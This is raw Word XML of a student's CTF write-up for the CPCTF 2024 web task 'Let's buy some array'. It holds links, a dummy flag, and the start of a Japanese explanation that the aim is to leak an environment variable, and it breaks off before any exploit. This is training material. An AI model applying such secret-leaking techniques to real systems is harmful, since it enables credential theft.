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5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpX="137" w:tblpY="116"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1639"/>
        <w:gridCol w:w="7705"/>
      </w:tblGrid>
      <w:tr w:rsidR="005D5EA8" w:rsidTr="005D5EA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">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 xml:space="preserve">Белютий Назар, КБ-221, </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2328"/>
                <w:kern w:val="36"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2328"/>
                <w:kern w:val="36"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>2024.06.27</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D5EA8" w:rsidTr="005D5EA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5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Турнир, название</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задачи</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:highlight w:val="lightGray"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>категории, ссылки</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D5EA8" w:rsidTr="005D5EA8">
        <w:trPr>
          <w:trHeight w:val="470"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline"/>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Турнир</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7684" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline"/>
              <w:outlineLvl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>CPCTF 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D5EA8" w:rsidTr="005D5EA8">
        <w:trPr>
          <w:trHeight w:val="470"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Задача</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7684" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline"/>
              <w:outlineLvl w:val="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:t>Let's buy some array</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D5EA8" w:rsidTr="005D5EA8">
        <w:trPr>
          <w:trHeight w:val="470"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline"/>
              <w:outlineLvl w:val="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Категории</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7684" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline"/>
              <w:outlineLvl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D5EA8" w:rsidRPr="005D5EA8" w:rsidTr="005D5EA8">
        <w:trPr>
          <w:trHeight w:val="470"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline"/>
              <w:outlineLvl w:val="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Ссылка</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7684" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId4" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>https://ctftime.org/event/2338/tasks/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>https://blog.hamayanhamayan.com/entry/2024/04/21/210723</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D5EA8" w:rsidTr="005D5EA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5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>Условие</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">задачи </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D5EA8" w:rsidTr="005D5EA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">На </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ctftime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> не было задач по этому турниру</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5943600" cy="23698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369820"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Был отдельный сайт с </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>врайтапами</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> на японском языке</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D5EA8" w:rsidTr="005D5EA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5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="5B9BD5" w:themeColor="accent1"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="5B9BD5" w:themeColor="accent1"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>РЕШЕНИЕ (сохранить особенности текста и ссылки)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D5EA8" w:rsidTr="005D5EA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rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0"/>
              <w:outlineLvl w:val="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>Quick</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D5EA8" w:rsidRPr="005D5EA8" w:rsidTr="005D5EA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344"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5D5EA8" w:rsidRPr="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="242424"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId6" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                </w:rPr>
                <w:t>ソースコード</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:t>が与えられる</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
              </w:rPr>
              <w:t>./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
              </w:rPr>
              <w:t>Dockerfile</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:t>に</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
              </w:rPr>
              <w:t>ENV</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
              </w:rPr>
              <w:t xml:space="preserve"> FLAG=CPCTF{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
              </w:rPr>
              <w:t>dummy_flag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:t>とあるので</w:t>
            </w:r>
            <w:hyperlink r:id="rId7" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                </w:rPr>
                <w:t>環境変数</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:t>が取れればいい</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D5EA8">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
